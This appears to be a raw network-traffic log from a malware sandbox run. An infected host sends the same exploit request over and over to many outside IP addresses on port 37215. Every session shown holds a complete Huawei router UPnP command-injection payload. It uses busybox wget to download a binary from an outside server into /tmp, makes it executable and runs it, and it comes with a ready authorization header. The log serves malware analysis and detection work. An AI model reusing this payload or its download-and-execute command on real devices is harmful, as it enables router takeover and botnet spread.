                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2266192.168.2.1550228157.73.149.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465451002 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2267192.168.2.154360045.138.88.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465465069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2268192.168.2.1544128102.46.237.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465488911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2269192.168.2.1537526138.110.233.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465512991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2270192.168.2.155088694.252.137.12337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465528965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2271192.168.2.1548674181.201.52.22837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465547085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2272192.168.2.155009241.21.1.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465564013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2273192.168.2.1544094197.135.55.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465596914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2274192.168.2.1549728102.169.240.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465611935 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2275192.168.2.153664063.44.197.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465996027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2276192.168.2.155652031.120.132.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466026068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
